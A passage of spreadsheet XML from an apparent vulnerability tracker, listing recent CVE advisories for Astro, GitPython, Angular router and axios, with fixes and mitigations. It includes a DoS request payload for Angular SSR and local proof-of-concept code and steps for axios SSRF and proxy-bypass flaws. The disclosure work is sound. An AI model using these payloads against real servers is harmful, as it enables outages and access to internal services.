        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102983</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/netlify</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr">
        <is>
          <t>8.2.4</t>
        </is>
      </c>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-918</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 5.2.0 until 8.2.4, the @astrojs/netlify adapter generates regular expressions for Netlify Image CDN remote-image allowlists without anchoring them to the beginning of the URL. Because Netlify evaluates these expressions with RegExp.test(), an allowed origin appearing only in a source URL's path or query can satisfy image.domains or image.remotePatterns while the URL's actual host remains attacker-controlled. An unauthenticated request to the public /.netlify/images endpoint can therefore cause the Image CDN to request attacker-selected URLs and may probe or reach internal services. Netlify egress protections may constrain reachable targets, and image transformation limits direct response exfiltration; no confidentiality or integrity impact has been demonstrated. This issue is fixed in version 8.2.4.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102983</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100689</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>3.1.62</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr"/>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>**Affected:** `GitPython` **3.1.61** (latest release) and `main` — `git/objects/submodule/base.py`. `git diff 3.1.61 origin/main -- git/objects/submodule/` is empty, so both are identical here.
---
## The gap
The fix for `GHSA-hmq2-w58f-27jc` added `Submodule._validated_name()` and wired it into `update()` and five siblings, closing the `.gitmodules` **name** → `.git/modules/&lt;name&gt;` traversal. The other attacker-controlled `.gitmodules` field, **`path`**, is read raw:
```python
# git/objects/submodule/base.py:172-177
def _set_cache_(self, attr):
    if attr in ("path", "_url", "_branch_path"):
        reader = self.config_reader()
        self.path = reader.get("path")          # raw .gitmodules value
```
and GitPython's own containment guard is applied in only two of the places that consume it:
```
400: def _to_relative_path(cls, parent_repo, path)      # the guard (abspath + commonpath containment)
542:     path = cls._to_relative_path(repo, path)        # add()   — guarded
1041:    module_checkout_path = self._to_relative_path(self.repo, module_path)   # move() — guarded
```
`update()` validates only the name and then uses the path-derived absolute location directly:
```
788:  self._validated_name(self.name)                    # NAME only
801:  checkout_module_abspath = self.abspath             # derived from self.path — unguarded
821:  os.makedirs(checkout_module_abspath, exist_ok=True)
```
So `path = ../../../tmp/escaped` in an attacker-authored `.gitmodules` selects the directory that gets created and, on the clone path, populated from the submodule URL. The same absolute location is what `force_remove` hands to `shutil.rmtree`.
The asymmetry is the argument: this is not a missing concept — the project wrote `_to_relative_path()` precisely for this, and `add()`/`move()` use it. `update()` does not.
## Honest limits (please read before rating)
- **The most common flow is not affected.** `Repo.clone_from(...)` → `repo.submodules` → `sm.update(init=True)` re-derives `path` from a canonical tree lookup, and real git refuses to check out a tree containing a `..` component, so an evil `.gitmodules` never lands in the working tree in the first place. A reachable trigger therefore requires the victim's code to name a **non-HEAD commit** (a historical-commit API such as `submodule_update(previous_commit=...)`).
- **The researcher did not build that end-to-end trigger.** The researcher only verified first-hand the code above: the guard's two call sites, the name-only validation in `update()`, and the unguarded `abspath` → `os.makedirs()` flow at 3.1.61 == `main`.
## Suggested fix
Apply the guard the project already has, wherever the path is consumed:
```python
# in update(), before deriving abspath (and in any other consumer of self.path):
checkout_rel = self._to_relative_path(self.repo, self.path)   # raises if it escapes the working tree
```
Better still, validate at the boundary: reject a `.gitmodules` entry whose `path` is absolute or contains a `..` component when the section is first read in `_set_cache_()`/`iter_items()`, so no consumer can be added later without the check. A regression test with `path = ../escaped` alongside the existing `name` test would pin both fields.
## Prior art checked
`GHSA-hmq2-w58f-27jc` (this is a residual of its fix, in the sibling field, not a re-report) plus the repository's 30 published advisories — none mentions the `path` field or `_to_relative_path`. Searched issues and PRs for `_to_relative_path`, `gitmodules path` and `submodule traversal`: no report of this.
## Credit
**kta1kri**.
---
## Appendix — `EVIDENCE_gitpython_path_unguarded_20260901.txt` (inlined; advisories accept no attachments)
```text
=== EVIDENCE: GitPython — the .gitmodules 'path' field reaches os.makedirs()/clone unguarded ===
Mon Aug 31 18:45:22 UTC 2026
--- artifact: tag 3.1.61 (latest release); git diff 3.1.61 origin/main -- git/objects/submodule/ is empty ---
--- the containment guard GitPython owns, and its only two call sites ---
33:    _to_relative_path,
400:    def _to_relative_path(cls, parent_repo: "Repo", path: PathLike) -&gt; PathLike:
407:            path = _to_relative_path(parent_repo.working_tree_dir, path)
542:        path = cls._to_relative_path(repo, path)
1041:        module_checkout_path = self._to_relative_path(self.repo, module_path)
--- the parent fix (_validated_name) call sites: it validates the NAME ---
309:    def _validated_name(cls, name: str) -&gt; str:
321:        name = cls._validated_name(name)
541:        cls._validated_name(name)
788:            self._validated_name(self.name)
1040:        self._validated_name(self.name)
1181:        self._validated_name(self.name)
1439:        self._validated_name(self.name)
1440:        self._validated_name(new_name)
1489:        self._validated_name(self.name)
--- update(): name validated, path not; abspath -&gt; os.makedirs ---
        try:
            self._validated_name(self.name)
            # ENSURE REPO IS PRESENT AND UP-TO-DATE
                # END early abort if init is not allowed
                checkout_module_abspath = self.abspath
                module_abspath = self._module_abspath(self.repo, self.path, self.name)
                # ``git submodule deinit`` leaves the repository in
                # ``.git/modules`` and empties the checkout. Reconnect that retained
                # repository instead of trying to clone over it.
                if not dry_run and osp.isdir(module_abspath):
                    try:
                        git.Repo(module_abspath)
                    except InvalidGitRepositoryError:
                        pass
                    else:
                        if osp.lexists(checkout_module_abspath) and (
                            osp.islink(checkout_module_abspath)
                            or not osp.isdir(checkout_module_abspath)
                            or os.listdir(checkout_module_abspath)
                        ):
                            raise OSError(
                                "Module directory at %r does already exist and is non-empty" % checkout_module_abspath
                            )
                        os.makedirs(checkout_module_abspath, exist_ok=True)
                        self._write_git_file_and_module_config(checkout_module_abspath, module_abspath)
                        mrepo = git.Repo(checkout_module_abspath)
--- where self.path comes from (raw .gitmodules value) ---
    def _set_cache_(self, attr: str) -&gt; None:
        if attr in ("path", "_url", "_branch_path"):
            reader: SectionConstraint = self.config_reader()
            # Default submodule values.
            try:
                self.path = reader.get("path")
            except cp.NoSectionError as e:
```</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100689</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101896</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/router</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>20.3.32, 21.2.24, 22.2.0</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>A denial of service (DoS) vulnerability was identified in `@angular/router` when Server-Side Rendering (SSR) is enabled on Node.js (V8).
When `@angular/router` parses incoming request URLs, it extracts path segments, matrix parameters, and child outlets into plain JavaScript objects (`Record&lt;string, string&gt;`). When matrix parameter names or outlet names are numeric strings (such as `/a;990;2522`), the V8 JavaScript engine interprets them as array-indexed properties rather than named properties.
Under V8's internal property-storage heuristics, setting numeric keys on an initially empty object causes V8 to allocate a dense array backing store (`HOLEY_ELEMENTS`) sized to the maximum index rather than falling back to sparse dictionary storage. Specifically, assigning sequential or moderately large numeric keys (like `990` followed by `2522`) causes V8 to allocate a contiguous backing store of ~2,522 pointers (~20 KB to 25 KB of heap) for a single 11-byte segment.
Because each segment in a URL path allocates its own independent `parameters` object, an attacker can craft URLs with repeated numeric matrix parameters to achieve an asymmetric memory amplification factor of approximately **~350x**.
### Impact
Successful exploitation allows an unauthenticated remote attacker to exhaust the Node.js old-space heap with modest request volume, terminating the SSR worker with an unrecoverable `JavaScript heap out of memory` fatal error and causing a Denial of Service.
* **High Amplification:** A single 11-byte segment (`/a;990;2522`) consumes ~20 KB–25 KB of V8 heap.
* **Low Concurrency Required:**
  * With 8 KB request paths (~740 segments, within default Nginx 8 KB buffer limits), as few as **12–22 concurrent requests** crash a 256 MiB–512 MiB Node.js SSR worker.
  * With smaller 1 KB–2 KB request paths (~90–180 segments), a burst of ~50–100 concurrent requests achieves the same heap exhaustion.
* **Client-side SPAs Unaffected:** Pure client-side Angular applications (Single Page Applications without SSR) are **not** vulnerable, as local browser memory consumption does not cross a security boundary.
### Attack Preconditions &amp; Vulnerable Configurations
An application is affected only if **all** of the following conditions are met:
* **SSR Enabled:** The application runs in a Server-Side Rendering environment powered by Node.js / V8.
* **Direct Router Parsing:** User-controlled request URLs are parsed by `@angular/router` during SSR.
* **No Reverse-Proxy Semicolon/Segment Filtering:** Upstream reverse proxies (Nginx, Cloudflare, ALB) forward URLs containing semicolons (`;`) and multiple path segments without stripping or rejecting them.
#### Exploit Payload Example
An attacker sends concurrent HTTP requests with repeated numeric matrix parameters:
```http
GET /a;990;2522/a;990;2522/a;990;2522/... HTTP/1.1
Host: example.com
```
Even with paths under 2 KB, overlapping requests during SSR will rapidly consume the V8 heap until the process crashes.
### Patches
The issue is resolved by updating `@angular/router` to enforce V8 dictionary elements storage (`setUrlDerivedKey`) for numeric URL-derived keys (index &gt;= 32). This prevents V8 from allocating oversized contiguous array backing stores while preserving route matching, parameter values, and component input bindings.
* `22.2.0`
* `21.2.24`
* `20.3.32`
### Workarounds &amp; Mitigations
If you cannot immediately upgrade to a patched version, apply one of the following mitigations at your edge or reverse proxy:
1. **Block or Sanitize Matrix Parameters at the Reverse Proxy:**  
   Configure your reverse proxy (e.g., Nginx, Cloudflare, or AWS WAF) to reject or strip semicolons (`;`) in request paths before forwarding requests to the Angular SSR service:
   ```nginx
   # Nginx example: reject requests containing matrix parameters
   if ($uri ~* ";") {
       return 400;
   }
   ```
2. **Enforce Strict Path Segment Limits:**  
   Reject requests with excessive path depth (e.g., more than 20–30 segments).
3. **Increase Node.js Old Space:**  
   Increase `--max-old-space-size` (e.g., to 2048 or 4096 MB) to increase the concurrency threshold required to exhaust memory, though this does not fully eliminate the vulnerability under sustained traffic.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101896</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr"/>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js does not apply configured DNS lookup or proxy controls when a request uses `httpVersion: 2`. The HTTP/1 adapter path wraps and forwards `config.lookup`, builds normal request options, and applies proxy routing through `setProxy()`. The HTTP/2 path builds a session with `http2.connect()` using only `options.http2Options`, which drops the top-level `lookup`, `agent`, and proxy state.
Applications are affected when they allow a user to influence request destinations, enable axios HTTP/2, and rely on axios `lookup` or proxy routing to prevent SSRF or enforce outbound network policy.
## Impact
In affected server-side deployments, an attacker can cause axios to connect directly to destinations that the configured resolver or proxy would have rejected. Depending on reachable services, this can expose cloud metadata, internal service responses, or allow state-changing requests to internal systems.
This is not an unconditional SSRF in every axios deployment. It requires `httpVersion: 2` and an application-level trust boundary where user-influenced URLs are constrained by `lookup` or proxy policy.
## Affected Functionality
Affected:
- Node.js HTTP adapter with `httpVersion: 2`.
- `config.lookup` supplied as a DNS policy.
- Explicit `config.proxy` and environment-derived proxy settings for HTTPS HTTP/2 requests.
Not affected:
- Browser adapters.
- Node HTTP/1 requests, which pass `lookup` to the transport and apply proxy handling.
- Applications that validate destination hosts independently before calling axios.
## Technical Details
In `lib/adapters/http.js`, the adapter reads `lookup`, wraps it, stores it on the request `options`, and applies `setProxy()` before selecting a transport. For HTTP/2, `http2Transport.request()` builds an authority from `options.protocol`, `options.hostname`, and `options.port`, then calls:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` ultimately calls `http2.connect(authority, options)` with only the `http2Options` object. The configured DNS lookup and the proxy or tunneling agent installed on the top-level request options are not forwarded into that call.
Local verification on axios `1.18.1` showed `lookupCalls: 0` while an HTTP/2 request to a local h2 origin succeeded. A second local HTTPS h2 verification with an explicit rejecting HTTP proxy showed the origin received the request and the proxy observed no traffic.
## Proof of Concept of Attack
Local constrained demonstration:
1. Start an HTTP/2 server on loopback.
2. Call `axios.get("http://localhost:&lt;port&gt;/internal", { httpVersion: 2, lookup })` where `lookup` throws `EPOLICY`.
3. Observe that the request succeeds and the lookup counter remains `0`.
For proxy routing:
1. Start an HTTPS HTTP/2 origin and a local HTTP proxy that rejects every request and CONNECT.
2. Call axios with `httpVersion: 2`, `http2Options: { rejectUnauthorized: false }`, and explicit `proxy`.
3. Observe that the origin receives the request and the proxy receives nothing.
Expected safe behavior is that either the lookup policy blocks the request or the proxy observes and rejects the request.
## Workarounds
Use the HTTP/1 adapter path for requests that depend on axios `lookup` or proxy controls. Alternatively, enforce destination allow/deny policy before calling axios, outside the adapter transport path.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
  ### Summary
I found that Axios does not apply the configured `lookup` function or proxy when a request uses `httpVersion: 2`. The HTTP/1 adapter applies both controls, but the HTTP/2 path connects straight to the URL's hostname using `http2.connect()`.
This matters for server applications that accept a user-influenced URL and use a custom DNS lookup or mandatory outbound proxy to prevent SSRF. Switching the Axios instance to HTTP/2 silently removes those controls, allowing the request to reach an address the application intended to block.
I reproduced this on the current npm release, Axios 1.18.1.
### Details
The HTTP adapter reads and wraps the caller's `lookup` function, builds the normal request options, and calls `setProxy()`:
- `lib/adapters/http.js`, around lines 530-578: reads and wraps `lookup`
- `lib/adapters/http.js`, around lines 895-954: adds `lookup` to `options` and applies `setProxy()`
For HTTP/2, however, the adapter selects `http2Transport`. That transport creates an authority from the destination and only passes `options.http2Options` to the session pool:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` then calls:
```js
const session = http2.connect(authority, options);
```
At this point `options` is only the `http2Options` object. The top-level `lookup`, the proxy tunnelling agent created by `setProxy()`, and the selected `httpAgent`/`httpsAgent` are not forwarded. The request therefore uses the system resolver and opens a direct connection to the origin.
The same root cause affects both explicit proxy configuration and environment-derived proxy configuration. I kept the PoC local and used an explicit proxy so the result does not depend on shell environment variables.
### PoC
I attached [axios_http2_transport_controls_poc.mjs](https://drive.google.com/file/d/1lKXBOLDoysOFRmaRyV1tMVLx3P0Ah4gV/view?usp=sharing). The PoC is entirely local and sets up three pieces:
1. An HTTPS origin with HTTP/2 enabled. If reached, it records the request and returns `REACHED_BLOCKED_ORIGIN`.
2. An HTTP proxy that records traffic but rejects every normal request and every CONNECT request with `502 Bad Gateway`.
3. A custom Axios `lookup` callback that rejects every DNS lookup with an `EPOLICY` error.
The first request is an HTTP/1 control request. It uses the blocking `lookup` callback and has proxying disabled. Axios calls the callback, receives `EPOLICY`, and does not reach the origin. This confirms that the callback works and that the hostname is blocked through the normal adapter path.
The second request targets the same URL with `httpVersion: 2`. It is given both security controls: the same blocking `lookup` callback and the rejecting proxy. If Axios honors either one, this request cannot reach the origin. It should fail with `EPOLICY`, or it should reach the proxy and receive its `502` response.
Instead, the request returns HTTP 200 with `REACHED_BLOCKED_ORIGIN`. The lookup counter does not increase, and the proxy records no request or CONNECT attempt. The origin is the only server that records traffic. This shows that the HTTP/2 path skipped both controls and connected directly using the system resolver.
To reproduce, run the attachment from the root of an Axios checkout:
Run it from the root of an Axios checkout:
```bash
git checkout v1.18.1
npm install --ignore-scripts
node /path/to/axios_http2_transport_controls_poc.mjs
```
Relevant output from my run:
```json
{
  "axiosVersion": "1.18.1",
  "configuredControls": {
    "lookup": "reject every DNS lookup with EPOLICY",
    "proxy": "http://127.0.0.1:&lt;port&gt; (reject every request)"
  },
  "http1Control": "EPOLICY: blocked by application DNS policy",
  "http2Result": {
    "status": 200,
    "data": "REACHED_BLOCKED_ORIGIN"
  },
  "lookupCalls": 1,
  "proxyObservedTraffic": false,
  "events": [
    {
      "server": "origin",
      "protocol": "h2",
      "path": "/internal"
    }
  ]
}
```
The important parts of the output are:
- `http1Control` contains `EPOLICY`, proving the DNS policy blocks the destination under HTTP/1.
- `lookupCalls` is still `1` after both requests, proving HTTP/2 never called the configured resolver.
- `proxyObservedTraffic` is `false`, proving HTTP/2 did not use the configured proxy.
- `http2Result.status` is `200`, and the sole event belongs to the origin, proving Axios connected directly to the blocked destination.
### Impact
The vulnerable configuration is a Node.js application that:
- enables Axios HTTP/2 using `httpVersion: 2`;
- lets an application user influence the request destination; and
- relies on Axios's `lookup` option or proxy routing to enforce a destination or egress policy.
In that setup, an unauthenticated application user may be able to make the server connect directly to loopback, private-network, or link-local services that the lookup policy or proxy would have rejected. Depending on the reachable service, this can expose cloud credentials or internal data, modify internal services, or affect availability.
HTTP/2 support is marked experimental, but neither the HTTP/2 documentation nor the proxy documentation says that `lookup` and proxy controls are ignored. The proxy documentation states that HTTPS requests are sent through a CONNECT tunnel. More importantly, Axios's threat model tells callers that destination validation is their responsibility; this behavior silently bypasses such caller-supplied validation.
I did not test against any third-party or production service. The PoC only uses listeners on my own machine.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101899</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr"/>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios supports proxy environment variables and evaluates `NO_PROXY` exclusions in the Node.js adapter. CIDR-form `NO_PROXY` entries such as `127.0.0.0/8`, `10.0.0.0/8`, or `169.254.169.254/32` are not interpreted as IP ranges. As a result, a request to an IP address inside a configured CIDR exclusion can still be sent through the configured proxy.
This affects deployments that rely on CIDR notation to keep loopback, private, Kubernetes, CI, or cloud metadata traffic away from proxy infrastructure.
## Impact
If the configured proxy is outside the intended trust boundary, requests that operators expected to bypass the proxy may be exposed to it. For plaintext HTTP targets, the proxy can see and modify URLs, headers, and bodies. For HTTPS targets, the proxy still observes connection metadata and may receive CONNECT requests that policy expected to avoid.
This is a proxy exclusion bypass, not arbitrary proxy injection by itself.
## Affected Functionality
Affected:
- Node.js adapter proxy environment handling.
- `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY`, or lowercase equivalents.
- CIDR entries in `NO_PROXY`.
Not affected:
- Exact host or exact IP `NO_PROXY` entries where axios matching succeeds.
- Requests configured with `proxy: false`.
- Browser adapters.
## Technical Details
`lib/helpers/shouldBypassProxy.js` parses each `NO_PROXY` entry into a host and optional port, normalizes hostnames, and then compares exact hostnames, suffix entries, wildcard-prefix entries, and loopback equivalents. It does not parse CIDR notation.
Local verification on axios `1.18.1`:
```js
process.env.NO_PROXY = '127.0.0.0/8';
shouldBypassProxy('http://127.0.0.1:1234/'); // false
```
The expected result for CIDR-aware bypass policy is `true`.
## Proof of Concept of Attack
Constrained local demonstration:
1. Set `HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;`.
2. Set `NO_PROXY=127.0.0.0/8`.
3. Request `http://127.0.0.1:&lt;internal-port&gt;/metadata`.
4. Observe that axios sends the request through the proxy instead of directly to the internal listener.
## Workarounds
Use exact host or IP entries in `NO_PROXY` for sensitive destinations until CIDR matching is fixed, for example `127.0.0.1,localhost,169.254.169.254`. For individual requests that must not use a proxy, set `proxy: false`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 honors `HTTP_PROXY` / `HTTPS_PROXY` and supports `NO_PROXY` host exclusions, but CIDR-form `NO_PROXY` entries such as `127.0.0.0/8` are not treated as network ranges. As a result, requests to IPs covered by a configured CIDR exclusion may still be sent through the configured proxy.
In the attached PoC, a request to `127.0.0.1` is sent through `HTTP_PROXY` despite `NO_PROXY=127.0.0.0/8`.
This can cause proxy exclusion bypass in environments where operators use CIDR notation to exclude loopback, private, internal, Kubernetes, CI, or cloud metadata address ranges from proxying.
## Details
Axios supports proxy environment variables, including `HTTP_PROXY` / `HTTPS_PROXY` and `NO_PROXY`-style exclusions. Axios’s threat model treats environment proxy handling as security-relevant and lists `NO_PROXY` as a mitigation for proxy environment variable hijack, including hardening for CIDR ranges, IPv6 literals, and wildcard patterns. See: https://github.com/axios/axios/blob/a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b/THREATMODEL.md#t-r9-proxy-environment-variable-hijack
The issue is that CIDR-form `NO_PROXY` entries are not interpreted as network ranges. For example:
```text
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;
Target URL=http://127.0.0.1:&lt;internal-port&gt;/metadata
```
Since `127.0.0.1` is inside `127.0.0.0/8`, an operator may reasonably expect Axios to bypass the proxy for this request. Instead, Axios sends the request through `HTTP_PROXY`.
This appears to affect the proxy bypass decision path used for `NO_PROXY` / `no_proxy` handling. The relevant behavior is in Axios's Node proxy handling and `NO_PROXY` evaluation logic, including the `shouldBypassProxy` helper introduced for `no_proxy` hostname normalization and bypass checks.
The issue is not that Axios ignores `NO_PROXY` entirely. Exact host exclusions work. The issue is specifically that CIDR-form exclusions are silently treated as non-matching host/domain tokens rather than as network ranges, causing the request to be proxied.
This is security-relevant because CIDR notation is commonly used in container, CI, enterprise proxy, and cloud environments for ranges such as:
```text
127.0.0.0/8
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.169.254/32
```
If operators rely on those entries to prevent internal or metadata-style requests from traversing a proxy, Axios may violate that expectation.
## PoC
```js
import http from 'http';
import axios from 'axios';
function listen(server, host) {
  return new Promise((resolve, reject) =&gt; {
    server.once('error', reject);
    server.listen(0, host, () =&gt; resolve(server.address().port));
  });
}
function close(server) {
  return new Promise((resolve) =&gt; server.close(resolve));
}
let proxyHits = 0;
let internalHits = 0;
const internal = http.createServer((req, res) =&gt; {
  internalHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`internal service saw ${req.url}`);
});
const proxy = http.createServer((req, res) =&gt; {
  proxyHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`proxy saw request for ${req.url}`);
});
const internalHost = process.env.POC_INTERNAL_HOST || '127.0.0.2';
const proxyHost = process.env.POC_PROXY_HOST || '127.0.0.1';
let internalPort;
let proxyPort;
try {
  internalPort = await listen(internal, internalHost);
  proxyPort = await listen(proxy, proxyHost);
} catch (error) {
  console.error('Failed to bind local PoC servers.');
  console.error('On some systems 127.0.0.2 is unavailable; try:');
  console.error('  POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs');
  console.error('');
  throw error;
}
const targetUrl = `http://${internalHost}:${internalPort}/metadata`;
const proxyUrl = `http://${proxyHost}:${proxyPort}`;
const noProxy = process.env.POC_NO_PROXY || '127.0.0.0/8';
process.env.http_proxy = proxyUrl;
process.env.HTTP_PROXY = proxyUrl;
process.env.no_proxy = noProxy;
process.env.NO_PROXY = noProxy;
console.log('Axios NO_PROXY CIDR full axios network PoC');
console.log(`axios VERSION=${axios.VERSION || 'unknown'}`);
console.log(`NO_PROXY=${process.env.no_proxy}`);
console.log(`HTTP_PROXY=${process.env.http_proxy}`);
console.log(`Target URL=${targetUrl}`);
console.log('');
try {
  const response = await axios.get(targetUrl, {
    timeout: 2000,
  });
  console.log(`Response=${response.data}`);
  console.log(`Proxy hits=${proxyHits}`);
  console.log(`Internal direct hits=${internalHits}`);
